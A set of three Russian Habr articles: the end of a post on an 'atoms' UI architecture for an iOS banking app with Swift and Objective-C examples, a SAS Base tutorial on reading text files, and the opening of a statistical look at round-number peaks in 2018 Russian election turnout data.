Атом может быть и более сложным элементом. Он может инкапсулировать некую логику и дочерние `ViewController`'ы. Например, атом для выбора счёта из списка (причём по фильтру из контекста). Главное, чтобы вся сложность осталась внутри атома. Снаружи он остаётся таким же простым в использовании.

*Мою концепцию уже используют в строительстве*
Для примера, операция отправки платёжного поручения «по быстрой форме» (из кода скрыл все моменты, связанные с безопасностью, и да, права на код принадлежат ООО «Цифровые Технологии Будущего»):
```
class PayPPQuickOperation : Operation, AtomValueSubscriber {
private let dataSource = PayPPDataSource()
private var srcTitle, destBicInfo: TextAtom!
private var destName, destInn, destKpp, destAccount, destBic, destDesc, amount: TextInputAtom!
private var btnSend: ButtonAtom!
override init() {
super.init()
create()
initUI()
}
func create() {
srcAccount = AccountPickerAtom(title: "Списать со счета")
destName = TextInputAtom(caption: "ФИО или полное наименование получателя")
destInn = TextInputAtom(caption: "ИНН получателя", type: .DigitsOnly)
destKpp = TextInputAtom(caption: "КПП получателя", type: .DigitsOnly)
destAccount = TextInputAtom(caption: "Счет получателя", type: .DigitsOnly)
destBic = TextInputAtom(caption: "БИК", type: .DigitsOnly)
destBicInfo = TextAtom(caption: "Введите БИК, банк будет определен автоматически")
destDesc = TextInputAtom(caption: "Назначение платежа")
amount = TextInputAtom(caption: "Сумма, ₽", type: .Number)
btnSend = ButtonAtom(caption: "Перевести")
// Здесь можно быстро переставлять местами операции:
atoms = [
srcAccount,
destName,
destInn,
destKpp,
destAccount,
destBic,
destBicInfo,
destDesc,
amount,
btnSend,
]
destInn!.optional = true
destKpp!.optional = true
btnSend.controlDelegate = self // тап придёт в onButtonTap ниже
destBic.subscribeToChanges(self)
}
func initUI() {
destName.wideInput = true
destAccount.wideInput = true
destDesc.wideInput = true
destBicInfo.fontSize = COMMENT_FONT_SIZE
destName.capitalizeSentences = true
destDesc.capitalizeSentences = true
}
func onAtomValueChanged(sender: OperationAtom!, commit: Bool) {
if (sender == destBic) && commit {
dataSource.queryBicInfo(sender.stringValue,
success: { bicInfo in
self.destBicInfo.caption = bicInfo?.data.name
},
failure: { error in
// обработка ошибки, в данном случае не страшно
self.destBicInfo.caption = ""
})
}
}
func onButtonTap(sender: AnyObject?) {
// если несколько кнопок, то для каждого sender будет своё действие
var hasError = false
for atom in atoms {
if atom.needsAttention {
atom.errorView = true
hasError = true
}
}
if !hasError {
var params: [String : AnyObject] = [
"operation" : "pp",
"from" : srcAccount.account,
"name" : destName.stringValue,
"kpp" : destKpp.stringValue,
"inn" : destInn.stringValue,
...
"amount" : NSNumber(double: amount.doubleValue),
]
self.showSignVC(params)
}
}
}
```
И это весь код операции!!! Больше ничего не нужно, при условии, что у вас в наличии есть все нужные атомы. В данном случае они у меня уже были. Если нет, пишем новый и рисуем в сториборде. Конечно же, можно наследоваться от существующих.
`onAtomValueChanged()` — это имплементация протокола `AtomValueSubscriber`. Мы подписались на изменения текстового поля «БИК» и там делаем запрос, который возвращает имя банка по БИК. Значение `commit == true` для текстового поля приходит из евента `UIControlEventEditingDidEnd`.
Последняя строчка `showSignVC()` — показать `ViewController` для операции подписания, которая представляет из себя *просто ещё одну* операцию, которая состоит из тех же самых простых атомов (формируется из элементов матрицы безопасности, которые приходят с сервера).
Я не привожу код класса `Operation`, т.к. вы можете найти более удачное решение. Я решил (в целях экономии времени разработки) скармливать `atoms` табличному `ViewController`'у. Все «кирпичики» нарисованы в IB ячейками таблиц, инстанцируются по cell id. Таблица даёт автоматический пересчёт высоты и прочие удобства. Но получается, что сейчас размещение атомов у меня возможно только в таблице. Для айфона хорошо, для айпада может быть не очень. Пока лишь единичные банки в российском аппсторе грамотно используют пространство на планшетах, остальные тупо копируют UI айфонов и только добавляют левую менюшку. Но в идеале да, надо переделать на `UICollectionView`.
Зависимости
-----------
Как известно, при вводе каких-либо форм, в зависимости от значений одних полей, другие поля могут видоизменяться или прятаться, как мы видели на примере БИК выше. Но там одно поле, а в полной платёжке их в разы больше, поэтому нужен простой механизм, который потребует минимум телодвижений для динамического показа/скрытия полей. Как это легко сделать? На помощь снова приходят атомы :) а также `NSPredicate`.
**Вариант 1**:
```
func createDependencies() {
// ppType - выбор типа платёжки, что-то вроде выпадающего списка (EnumAtom)
ppType.atomId = "type"
ppType.subscribeToChanges(self)
let taxAndCustoms = "($type == 1) || ($type == 2)"
...
// а это поля ввода:
field106.dependency = taxAndCustoms
field107.dependency = taxAndCustoms
field108.dependency = taxAndCustoms
...
```
Это пример для платёжек. Аналогичная система работает для электронных платежей в пользу различных провайдеров, где в зависимости от некоторого выбора (например, платить по счётчикам или произвольную сумму) пользователь заполняет разный набор полей.
*[Вот тут](https://habrahabr.ru/company/e-Legion/blog/225715/) ребята создали для этих целей «некий фреймворк», но мне как-то хватило нескольких строк.*
**Вариант 2**, если вам не хватает языка предикатов, или вы его не знаете, то считаем зависимости функцией, например, isDestInnCorrect():
```
destInn.subscribeToChanges(self)
destInnError.dependency = "isDestInnCorrect == NO"
```
Думаю, может, будет более красиво, если переименовать свойство:
```
destInnError.showIf("isDestInnCorrect == NO")
```
Текстовый атом `destInnError`, в случае некорректного ввода, рассказывает пользователю, как правильно заполнять ИНН по 107-му приказу.
К сожалению, компилятор за вас не проверит, что данная операция имплементирует метод `isDestInnCorrect()`, хотя это наверно можно сделать макросами.
И собственно установка видимости в базовом классе `Operation` (сорри за Objective C):
```
- (void)recalcDependencies {
for (OperationAtom *atom in atoms) {
if (atom.dependency) {
NSPredicate *predicate = [NSPredicate predicateWithFormat:atom.dependency];
BOOL shown = YES;
NSDictionary \*vars = [self allFieldsValues];
@try {
shown = [predicate evaluateWithObject:self substitutionVariables:vars];
}
@catch (NSException \*exception) {
// тут отладочная инфа
}
atom.shown = shown;
}
}
}
```
Посмотрим, какие ещё будут проверки. Возможно, операция не должна эти заниматься, т.е. всё перепишется на вариант
```
let verifications = Verifications.instance
...
if let shown = predicate.evaluateWithObject(verifications,
substitutionVariables: vars) { ...
```
One More Thing
--------------
А вообще, что касается объектных паттернов в клиент-серверном взаимодействии, не могу не отметить исключительное удобство при работе с JSON, которое даёт библиотека [JSONModel](https://github.com/jsonmodel/jsonmodel). Dot notation вместо квадратных скобок для получаемых JSON-объектов, и сразу типизация полей, в т.ч. массивы и словари. Как результат, сильное повышение читаемости (и как следствие надёжности) кода для больших объектов.
Берём класс `JSONModel`, наследуем от него `ServerReply` (ибо каждый ответ содержит базовый набор полей), от `ServerReply` наследуем ответы сервера на конкретные виды запросов. Основной минус библиотеки — её нет на Swift (т.к. она работает на неких языковых лайфхаках), и по той же причине синтаксис странноват…
**Кусок примера**
```
@class OperationData;
@protocol OperationOption;
#pragma mark OperationsList
@interface OperationsList : ServerReply
@property (readonly) NSUInteger count;
@property OperationData \*data;
...
@end
#pragma mark OperationData
@interface OperationData : JSONModel
@property NSArray \*options;
@end
#pragma mark OperationOption
@interface OperationOption : JSONModel
@property NSString \*account;
@property NSString \*currency;
@property BOOL isowner;
@property BOOL disabled;
...
```
Но всё это легко юзается из Swift-кода. Единственное, чтобы приложение не падало из-за неправильного формата ответа сервера, все `NSObject`-поля нужно помечать как <`Optional`> и самому проверять на `nil`. Если хотим своё свойство, чтобы оно не мешалось `JSONModel`, пишем их модификатор <`Ignore`> или, по ситуации, `(readonly)`.
Выводы
------
Концепция «атомов» действительно сработала и позволила создать хорошую масштабируемую архитектуру мобильного банка. Код операций очень простой для понимания и модификации, и его поддержка, при сохранении исходной идеи, будет занимать O(N) времени. А не экспонента, в которую скатываются многие проекты.
Минус данной реализации состоит в том, что отображение сделано по-простому через `UITableView`, на смартфонах это работает, а под планшеты, в случае «продвинутого» дизайна, нужно переделать View и частично Presenter (сразу общее решение для смартфонов и планшетов).
**А как вы вписываете свою архитектуру в iOS SDK на больших проектах?** | https://habr.com/ru/post/318200/ | null | ru | null |
# Основы программирования на SAS Base. Урок 3. Чтение текстовых файлов
В предыдущей [статье](https://habrahabr.ru/company/sas/blog/349726/) мы познакомились с понятием библиотеки SAS, научились назначать библиотеку для файла Excel, а также познакомились с процедурой, которая создает детализированные отчеты.
Напомню, что скачать ПО вы можете на [сайте SAS](https://www.sas.com/ru_ru/software/university-edition.html), ссылка на документацию по установке SAS UE указана в [статье №1](https://habrahabr.ru/company/sas/blog/348168/).
В данной статье вы познакомитесь с несколькими способами чтения текстовых файлов.

Все примеры основаны на файлах, которые хранятся в директории c:\workshop\habrahabr и были созданы заранее в Notepad.
Для создания набора данных SAS из текстового файла, первый необходимо проанализировать, чтобы верно выбрать тип чтения текстового файла. Текстовый файл может содержать как стандартные, так и не страндартные данные.
Стандартные данные – это данные, которые SAS считает без каких-либо инструкций, например, значение переменной Salary в текстовом файле хранится как 12355.44 или дата уже записана как стандартная дата SAS ([см. Урок 1](https://habrahabr.ru/company/sas/blog/348168/)). А если вам необходимо обработать значение, например, $12.355,44 или же 01JAN2018, то требуется указать правило чтения, инструкцию, в соответствии с которой данные значения преобразуются в формат SAS. В данной статье кратко описано применение оператора INPUT для преобразования необработанных данных в наборы данных SAS.
Чтение текстового файла со стандартными данными с разделителем.
---------------------------------------------------------------
Рассмотрим простейший пример текстового файла. Файл managers1.dat является текстовым файлом с разделителем «запятая» и выглядит следующим образом:

Новый набор данных SAS должен содержать следующие переменные: ID, First\_Name, Last\_Name, Job\_Title, Country, Gender, Salary. Вы можете заметить, что данные, хранящиеся в этом файле являются стандартными, и SAS считает их без проблем.
Чтение текстового файла реализуется с помощью операторов INFILE и INPUT на шаге DATA.
Подробно изучить оператор INFILE можно в справочнике [SAS 9.4 DATA Step Statements: Reference](http://go.documentation.sas.com/?docsetId=lestmtsref&docsetTarget=n1rill4udj0tfun1fvce3j401plo.htm&docsetVersion=9.4&locale=ru).
Оператор INFILE задает внешний файл для чтения.
Общий синтаксис оператора:
```
INFILE file-specification;
```
**file-specification** – идентифицирует источник данных, он может быть внешним файлом или ссылкой на внешний файл.
**device-type** – метод доступа.
**options** – допустимые опции.
**operating-environment-options** – параметры рабочей среды.
В нашем конкретном случае оператор INFILE будет записан следующим образом:
```
infile "c:\workshop\habrahabr\managers1.dat" dlm=',';
```
**DLM=** (или delimiter=) — это опция оператора INFILE, которая задает альтернативный разделитель (пробел является разделителем по умолчанию), который будет использован для чтения внешнего файла. Список разделителей указывается в парных кавычках.
После того, как мы задали путь, необходимо задать имена переменных. В решении этой задачи нам поможет оператор [INPUT](http://go.documentation.sas.com/?docsetId=lestmtsref&docsetTarget=n0oaql83drile0n141pdacojq97s.htm&docsetVersion=9.4&locale=ru) .
Общий синтаксис оператора INPUT:
```
INPUT <@ | @@>;
```
**specification(s)** – могут включать переменные, списки переменных, признак текстового типа ($), pointer-control, спецификацию столбцов, форматы для чтения и так далее (подробнее – в справочнике [SAS 9.4 DATA Step Statements: Reference](http://go.documentation.sas.com/?docsetId=lestmtsref&docsetTarget=n0oaql83drile0n141pdacojq97s.htm&docsetVersion=9.4&locale=ru)).
**@** — спецификатор удержания строки.
Оператор INPUT в нашем случае будет записан следующим образом:
```
input ID First_Name $ Last_Name $ Job_Title $ Country $ Gender $ Salary;
```
Повторюсь еще раз, что чтение текстового файла происходит на шаге DATA, поэтому требуемый для чтения текстового файла код будет выглядеть так:
```
data managers;
infile "c:\workshop\habrahabr\managers1.dat" dlm=',';
input ID First_Name $ Last_Name $ Job_Title $ Country $ Gender $ Salary;
run;
```
Мы создаем временный набор данных SAS под названием managers, который будет храниться в библиотеке WORK до закрытия сеанса SAS ([см. Урок 2](https://habrahabr.ru/company/sas/blog/349726/))
Проверим, корректно ли работает код. Запустим программу и проверим Log:

Распечатаем набор данных:
```
proc print data=managers;
run;
```
Результат выполнения шага PROC PRINT:

Обратите внимание, что текстовые значения в некоторых столбцах «обрезаны». Запустим процедуру PROC CONTENTS для опеределения длины созданных переменных:
```
proc contents data=managers varnum;
run;
```
Опция VARNUM выводит переменные в том порядке, в котором они хранятся в таблице
Фрагмент вывода процедуры:

### Длина переменных
По умолчанию SAS Base создает переменные любого типа с длиной 8 байт. Чтобы избежать «обрезанных» значений длину необходимо задавать явно. Данная проблема легко решается с помощью оператора [LENGTH](http://go.documentation.sas.com/?docsetId=lestmtsref&docsetTarget=p1hgqgmxm3dpqcn1d4w5za5qbz0d.htm&docsetVersion=9.4&locale=ru).
Важно знать, что данный оператор необходимо писать перед оператором INPUT, это связано с особенностями работы SAS Base.
Итак, наш программный код с использованием оператора LENGTH будет выглядеть следующим образом:
```
data managers;
infile "c:\workshop\habrahabr\managers1.dat" dlm=',';
length First_Name $ 10 Last_Name $ 12 Job_Title $25 Country $2 Gender $1;
input ID First_Name Last_Name Job_Title Country Gender Salary;
run;
proc print data=managers;
run;
proc contents data=managers varnum;
run;
```
Принадлежность к типу переменных мы указали в операторе LENGTH, поэтому в INPUT просто перечислили названия переменных. Обратите внимание, что в операторе INPUT переменные перечисляются в том порядке, в каком они располагаются в источнике!
Запустим программу и изучим результаты:
Результат выполнения шага PROC PRINT:

Результат выполнения PROC CONTENTS:

Переменные выведены в другом порядке. Это связано с тем, что SAS Base читает все последовательно: сначала внесены переменные из оператора LENGTH, а лишь потом проверен INPUT, и набор данных дополнен переменными ID и Salary.
Для того, чтобы вывести столбцы в первоначальном порядке, мы можем длину переменных ID и Salary задать явно в операторе LENGTH. Минимальная длина для числовых переменных – 3 байта, но не забывайте, что при изменении длины числовой переменной на меньшую можно потерять точность числовых значений.
Таким образом, программа приобретает следующий вид:
```
data managers;
infile "c:\workshop\habrahabr\managers1.dat" dlm=',';
length ID 8 First_Name $ 10 Last_Name $ 12 Job_Title $25 Country $2 Gender $1 Salary 8;
input ID First_Name Last_Name Job_Title Country Gender Salary;
run;
proc print data=managers;
run;
```
### Постоянные атрибуты.
На шаге DATA зададим постоянные атрибуты переменным: формат и ярлык. В этом случае атрибуты будут записаны в дескриптор выходного набора данных и будут использоваться на каждом шаге PROC.
```
data managers;
infile "c:\workshop\habrahabr\managers1.dat" dlm=',';
length ID 8 First_Name $ 10 Last_Name $ 12 Job_Title $25 Country $2 Gender $1 Salary 8;
input ID First_Name Last_Name Job_Title Country Gender Salary;
label ID = 'Employee ID'
First_Name = 'First Name'
Last_Name = 'Last Name'
Job_Title = 'Job Title';
format Salary dollar11.2;
run;
proc contents data=managers varnum;
run;
```
Атрибуты выходного набора данных записаны в дескриптор:

Создадим отчет из полученного набора данных SAS. Обратите внимание, что в опциях PROC PRINT мы указываем параметр label для того, чтобы данная процедура использовала заданные ярлыки в отчете.
```
proc print data=managers label noobs;
run;
```

Чтение текстового файла с нестандартными данными с разделителем.
----------------------------------------------------------------
Рассмотрим текстовый файл managers2.dat из директории c:\workshop\habrahabr.
По сравнению с предыдущим есть столбцы, которые содержат не стандартные для SAS данные.

Новый набор данных должен содержать следующие переменные: ID, First\_Name, Last\_Name, Job\_Title, Country, Gender, Salary, Hire\_Date.
Переменная Salary содержит специальные символы, также дата в формате SAS — это число, представляющее количество дней, начиная с 1 января 1960 года, ([см. Урок 1](https://habrahabr.ru/company/sas/blog/348168/)), а HireDate хранит другие значения. Для того, чтобы считать нестандартные данные необходимо использовать формат ввода – Informat. Важно помнить, что данные в столбце должны быть одного типа для применения формата ввода.
Всю информацию по форматам ввода можно посмотреть в справочнике [SAS 9.4 Formats and Informats: Reference](https://support.sas.com/documentation/cdl/en/leforinforref/64790/HTML/default/viewer.htm#titlepage.htm).
Infromat – это правило, которое применяется для чтения не стандартных для SAS входных данных. Тип формата для чтения соответствует типу данных SAS. Например, в источнике хранится значение $100,000. Чтобы удалить знак доллара и запятую перед преобразованием данного значения в число, необходимо применить INFORMAT comma8. или dollar8. В этом случае в итоговой таблице будет храниться значения 100000.
Общий синтаксис формата для чтения выглядит следующим образом:
```
<$>informat.
```
**$** — указатель текстового типа.
**Informat** — название формата для чтения.
**w** — ширина поля, включая все символы.
**d** — количество десятичных знаков.
Считаем текстовый файл managers2.dat
```
data managers2;
infile "c:\workshop\habrahabr\managers2.dat" dlm=';';
input ID :8. First_Name :$10. Last_Name :$12. Job_Title :$25.
Country :$2. Gender :$1. Salary :dollar10. Hire_Date :date9.;
label ID = 'Employee ID'
First_Name = 'First Name'
Last_Name = 'Last Name'
Job_Title = 'Job Title';
format Salary dollar10. Hire_Date date9.;
run;
proc print data=managers2 noobs;
ID ID;
run;
```
Результаты выполнения процедуры:

### Обработка пропущенных значений.
Если в данных есть пропущенные значения, то можно использовать 2 опции DSD и MISSOVER.
DSD ищет пропущенные значение внутри строки, а MISSOVER – в конце.
Таким образом, если мы хотим считать файл managers2a, в котором два подряд идущих разделителя кодируют пропущенное значение:

Используя указанные опции, мы сможем с легкостью считать данный текстовый файл:
```
data managers2a;
infile "c:\workshop\habrahabr\managers2a.dat" dlm=';' dsd missover;
input ID :8. First_Name :$10. Last_Name :$12. Job_Title :$25.
Country :$2. Gender :$1. Salary :dollar10. Hire_Date :date9.;
label ID = 'Employee ID'
First_Name = 'First Name'
Last_Name = 'Last Name'
Job_Title = 'Job Title';
format Salary dollar10. Hire_Date date9.;
run;
proc print data=managers2a;
ID ID;
run;
```
Результат выполнения программы:

### Ошибка чтения данных.
Если в столбце данные разных типов или форматов, рассмотрим следующий пример
В директории c:\workshop\habrahabr хранится файл bad\_data.dat

Напишем DATA Step, который считает данный файл:
```
data new;
infile "c:\workshop\habrahabr\bad_data.dat" dlm=',';
input ID :8. First_Name :$10. Last_Name :$12. Job_Title :$25.
Country :$2. Gender :$1. Salary :5. Hire_Date :date9.;
label ID = 'Employee ID'
First_Name = 'First Name'
Last_Name = 'Last Name'
Job_Title = 'Job Title';
format Salary dollar10. Hire_Date date9.;
run;
proc print data=new;
ID ID;
run;
```
Запустим код и посмотрим Log:
В журнале указание на ошибку чтения данных:

Создаются две [автоматические переменные](http://go.documentation.sas.com/?docsetId=lrcon&docsetTarget=p0e0mk25gs9binn1s9jiu4otau29.htm&docsetVersion=9.4&locale=ru):\_N\_ и \_ERROR\_.
**\_N\_** — итерация шага.
**\_ERROR\_** — значение 1 указывает на ошибку.
Результат выполнения программы:

Обратите внимание, что значение «44» в переменной Country считалась без ошибок чтения данных, а для переменных Salary и Hire\_Date в Log появилось указание на ошибку чтения данных.
Использование указателя позиции начального символа переменной при чтении текстового файла
-----------------------------------------------------------------------------------------
Если нам необходимо считать подобный текстовый файл info.dat из директории c:\workshop\habrahabr:

Еще один вариант считать внешний файл – использовать указатель позиции начального символа переменной.
Указывается позиция, имя переменной и формат ввода (informat).
Код для нашего случая будет выглядеть следующим образом:
```
data info;
infile "c:\workshop\habrahabr\info.dat";
input @1 ID 3.
@4 Date mmddyy10.
@15 Job_Title $11.
@26 Bonus percent3.;
format Date date9. Bonus percent.;
run;
proc print data=info;
run;
```
Запустим код и проверим результат:

Чтение текстового файла с наблюдением в несколько строк.
--------------------------------------------------------
Если же нам необходимо считать текстовый файл, в котором одно наблюдение занимает несколько строк:

Решить данную задачу можно несколькими способами:
1. Использовать несколько операторов INPUT.
```
data managers6;
infile "c:\workshop\habrahabr\managers6.dat";
input ID :8. First_Name :$6. Last_Name :$10.;
input Job_Title :$11. Country :$2. Gender :$1. Salary :8.;
run;
```
2. Использовать указатель.
SAS загружает следующую запись (строку) при обнаружении символа слэш (/) в операторе INPUT:
```
data managers6;
infile "c:\workshop\habrahabr\managers6.dat";
input ID :8. First_Name :$6. Last_Name :$10./
Job_Title :$11. Country :$2. Gender :$1. Salary :8.;
run;
```
И в том и в другом случае создается набор данных managers6, который находится во временной библиотеке WORK ([см. Урок 2](https://habrahabr.ru/company/sas/blog/349726/))
Распечатаем полученный набор данных:
```
proc print data=managers6 noobs;
id id;
run;
```
Результат выполнения процедуры:

Импорт внешних файлов
---------------------
Для чтения внешних файлов можно использовать процедуру [PROC IMPORT](http://go.documentation.sas.com/?docsetId=proc&docsetTarget=n1qn5sclnu2l9dn1w61ifw8wqhts.htm&docsetVersion=9.4&locale=ru).
Импортируем текстовый файл managers5.

Процедура PROC IMPORT в нашем случае выглядит следующим образом:
```
proc import datafile="C:\workshop\habrahabr\managers5.dat"
dbms=dlm
out=managers
replace;
delimiter=',';
getnames=yes;
run;
proc print data=managers;
run;
```
Запустим код и посмотрим Log:

Результат выполнения программы:

Итак, это кратко о чтении текстовых файлов. Обратите внимание, что функционал у рассмотренных операторов и процедур намного обширнее, подробное описание представлено в документации.
В следующей статье рассмотрим создание наборов данных SAS. И, конечно, традиционно – Grow with SAS! | https://habr.com/ru/post/354284/ | null | ru | null |
# Решаем загадку круглых чисел на графике выборов 2018

Данная статья является ответом на вот эту статью ([Анализ результатов президентских выборов 2018 года. На федеральном и региональном уровне](https://habrahabr.ru/post/352424/)).
В той статье меня удивила фраза автора:
> Вместо нормального или логнормального распределения мы видим интересную кривую, с очень странными пиками на круглых значениях (70%, 75%, 80% и т.д.), возрастающую на около-100% явке и уходящей далеко вверх на 100%.
Сразу возникают вопросы:
* Почему автор считает, что вместо «странных» пиков должно быть нормальное или логнормальное распределение?
* Почему вообще пики считаются «странными»?
* Откуда могут появиться «естественные» пики на круглых значениях?
Та статья сильно политизирована и комментарии в ней соответствующие. В этой статье мы будем обсуждать только математику, поэтому политические взгляды попрошу держать при себе.
А в качестве бонуса, в конце статьи будет выложен **ключ к решению загадки «круглых чисел»** на графике выборов 2018.
Исходные данные
---------------
Файл БД (MongoDB) с результатами голосования (парсинг с [гос. сайта](http://www.vybory.izbirkom.ru/region/region/izbirkom?action=show&root=1&tvd=100100084849066&vrn=100100084849062®ion=0&global=1&sub_region=0&prver=0&pronetvd=null&vibid=100100084849066&type=227)), который был выложен автором исходной статьи:
Файл = [15-04-18.tar.xz](https://mega.nz/#F!DHwkVDAb!KVIl2vaizVPt43nV9JuT1A)
MD5 = 3a1c198cbc4ce102fbc074752fc0ca99
Мы будем исследовать график зависимости процента явки и количества УИКов с данной явкой. В исходной статье он выглядит так:

Вступление
----------
Все желающие могут [скачать](https://mega.nz/#F!DHwkVDAb!KVIl2vaizVPt43nV9JuT1A) БД и самостоятельно проверить на наличие ошибок. Мной из полученной БД были случайным образом выбраны и проверены данные по нескольким УИКам, что позволяет с некоторой вероятностью утверждать, что данные были загружены с гос. сайта корректно.
**Но, есть некоторые замечания:****Автор исходной статьи пока не дал пояснений, по заданным вопросам:**
> 1. По какой формуле вы считали % явки на каждом уике?
>
>
>
> 2. Поясните пожалуйста назначение атрибутов share и number\_bulletin.
>
>
>
> 3. Каким образом округлялись значения до 0.1%?
Но, по структуре БД видно, что скорее всего, атрибут number\_bulletin является самостоятельно рассчитанным параметром определяющим кол-во избирателей включаемых в «явку», а share – это процент явки, рассчитанный по формуле
`share = number_bulletin / results_0;`
где results\_0 – это «Число избирателей, включенных в список избирателей».
На станицах гос. сайта атрибутов number\_bulletin и share нет.
Странность заключается в том, что в БД number\_bulletin не всегда считается корректно (с точки зрения [официального](https://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%B5%D0%B7%D0%B8%D0%B4%D0%B5%D0%BD%D1%82%D1%81%D0%BA%D0%B8%D0%B5_%D0%B2%D1%8B%D0%B1%D0%BE%D1%80%D1%8B_%D0%B2_%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D0%B8_(2018)#%D0%A0%D0%B5%D0%B7%D1%83%D0%BB%D1%8C%D1%82%D0%B0%D1%82%D1%8B) расчета кол-ва людей принявших участие в выборах).
А именно, официальная формула такая:
* Число бюллетеней, выданных на участке +
* Число бюллетеней, выданных вне участка +
* Число бюллетеней, выданных досрочно
В БД number\_bulletin в большинстве случае совпадает с этой формулой, но при этом есть и множество УИКов, где number\_bulletin отличается, от приведенной выше формулы на кол-во 1-2 и больше бюллетеней, причем закономерности я не увидел.
Вот выборка с примером и hash-ключами УИКов, чтоб можно было быстро найти в БД:
Порядок атрибутов в строке:
ID — ключ УИК
RESULTS\_0 – поле results.0 из БД («Число избирателей, включенных в список избирателей»)
TEST\_NUMBER\_BULLETIN – рассчитанное значение по формуле
RESULTS\_NUMBER\_BULLETIN — значение в БД
TEST\_YAVKA — рассчитанное значение по формуле
RESULTS\_SHARE — значение в БД
`5ab557a2866a6a69f2cf8c90 2241 1368 1367 0,610441 61
5ab557aa866a6a69f2cf8ca8 2853 1665 1662 0,583596 58,25
5ab557b1866a6a69f2cf8cba 2138 1413 1412 0,660898 66,04
5ab557b1866a6a69f2cf8cbb 2093 1291 1290 0,616817 61,63
5ab557b3866a6a69f2cf8cc2 2463 1688 1687 0,685343 68,49
5ab557b5866a6a69f2cf8cc7 1583 1085 1084 0,685407 68,48
5ab557b9866a6a69f2cf8cd7 1483 912 911 0,614969 61,43
5ab557ba866a6a69f2cf8cdb 2166 1403 1402 0,647737 64,73
5ab557bb866a6a69f2cf8cdd 2186 1204 1203 0,550777 55,03
5ab557bc866a6a69f2cf8ce1 1574 986 985 0,626429 62,58
5ab557bd866a6a69f2cf8ce5 1284 803 802 0,625389 62,46
5ab557bd866a6a69f2cf8ce6 2543 1610 1608 0,63311 63,23
5ab557bf866a6a69f2cf8ced 2215 1353 1350 0,610835 60,95
5ab557cf866a6a69f2cf8d36 1627 1374 1372 0,844499 84,33
5ab557f7866a6a69f2cf8dbd 449 262 261 0,583518 58,13
5ab557f8866a6a69f2cf8dbf 597 349 347 0,584589 58,12
5ab55809866a6a69f2cf8dfa 194 156 155 0,804123 79,9`
Таким образом, если обсуждаемый график строился автором из БД с использованием значения share – то этот график не соответствует официальному варианту расчета явки. Но, я допускаю возможность, что данные атрибуты использовались автором в тестовых целях и приведенный им график построен без использования текущих значений share из БД.
**В любом случае, все графики данной статьи строятся по официальным формулам и не используют вышеописанные атрибуты.**
**[Официальная](https://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%B5%D0%B7%D0%B8%D0%B4%D0%B5%D0%BD%D1%82%D1%81%D0%BA%D0%B8%D0%B5_%D0%B2%D1%8B%D0%B1%D0%BE%D1%80%D1%8B_%D0%B2_%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D0%B8_(2018)#%D0%A0%D0%B5%D0%B7%D1%83%D0%BB%D1%8C%D1%82%D0%B0%D1%82%D1%8B) формула расчета явки:**
* Число бюллетеней, выданных на участке +
* Число бюллетеней, выданных вне участка +
* Число бюллетеней, выданных досрочно
**Все графики в данной статье построены по следующим параметрам:**
Явка на каждом уике = формула приведенная выше
Округление до ближайшего целого:
10.2 => 10
10.5 => 11
Округление до первого знака после запятой и последующих..:
0.22 => 0.2
0.25 => 0.3
Визуализация #1
---------------
Давайте посмотрим на графики с визуализацией кол-ва УИК по проценту явки, дополнительно добавив линию со средним размером УИК, чтобы проверить возможную корреляцию:
**График\_1а:**
Ось Х – Процент явки (интервал = 1%)
Ось Y(левая) – Количество УИК
Ось Y(правая) – Средний размер одного УИК (кол-во зарег. избирателей)
[](https://habrastorage.org/webt/jt/kk/su/jtkksuwdkyw2i_l8ifdugidzsim.png)
Видно, что на точке X=100 значение очень высокое, а средний размер УИК при этом уменьшается. В обсуждении [fediq](https://habr.com/users/fediq/) высказывалось логичное предположение:
> Высокая явка — нормальное явление для высокоорганизованных УИКов типа традиционных общин, режимных учреждений, военных частей.
Давайте посмотрим на первые 10 регионов по кол-ву УИК со 100% явкой:
K\_ALL — кол-во УИК в регионе
K\_100 — кол-во УИК со 100% явкой
REGION — название региона
`K_ALL K_100 REGION
393 346 foreign-countries
1580 213 primorsk
1911 165 dagestan
482 156 sakhalin
596 138 murmansk
2817 132 tatarstan
2052 128 st-petersburg
317 123 kamchatka_krai
948 67 arkhangelsk
854 60 khabarovsk`
**График\_1б:**
Ось Х – Процент явки (интервал = 0.1%)
Ось Y(левая) – Количество УИК
Ось Y(правая) – Средний размер одного УИК (кол-во зарег. избирателей)
+ Не выводится точка 100%, т.к. с ней остальные значения слишком мелкие.
[](https://habrastorage.org/webt/ep/qm/8n/epqm8ny3d_xzgulz7xg5rk1gdn8.png)
Появились те самые пики на круглых значениях.
**График\_1в:**
Ось Х – Процент явки (интервал = 0.01%)
Ось Y(левая) – Количество УИК
+ Не выводится точка 100%, т.к. с ней остальные значения слишком мелкие.
[](https://habrastorage.org/webt/l8/as/g-/l8asg-htymhggrz3icpxmcxoqgk.png)
Как и ожидалось с уменьшением шага кол-во пиков увеличивается и они расположены по всему графику.
**График\_1г:**
Ось Х – Процент явки (интервал = 0.001%)
Ось Y(левая) – Количество УИК
+ Не выводится точка 100%, т.к. с ней остальные значения слишком мелкие.
[](https://habrastorage.org/webt/zj/yo/ve/zjyoveoyuiveizjotcdesxznaue.png)
Как мы видим весь график в пиках, т.е. на данном масштабе – пики это нормальное явление.
**График\_1д:**
Ось Х – Процент явки (интервал = 0.001%)
Ось Y(левая) – Количество УИК
Увеличенная область для значения 80%
[](https://habrastorage.org/webt/15/5a/i5/155ai5a8aalmoac0mvltt8qjqsw.png)
Видим, что рядом с круглым 80% много мелких значений.
Визуализация #2
---------------
Теперь давайте посмотрим на те же самые графики, но под другим углом. Так как расположенные рядом друг с другом на графике по оси X точки (процент явки) ни чем не связаны (в каждую такую точку-выборку попадают совершенно разные УИКи с различным гео-положением, размером и настроением избирателей и т.п...), то разницы в каком порядке они стоят нет, поэтому отсортируем их по оси Х не по возрастанию процента явки, а по возрастанию кол-ва УИКов.
Т.е. на графиках выше мы видели, как при возрастании процента явки ведет себя кол-во УИК, а на данном графике мы увидим, как при возрастании кол-ва УИК ведет себя процент явки.
**График\_2а:**
Ось Х – номер точки из БД по порядку
Ось Y(левая) – Количество УИК
Ось Y(правая) – Процент явки (интервал = 1%)
[](https://habrastorage.org/webt/fy/_b/cq/fy_bcqkuh1-hcaqjcvtcj1v1v2u.png)
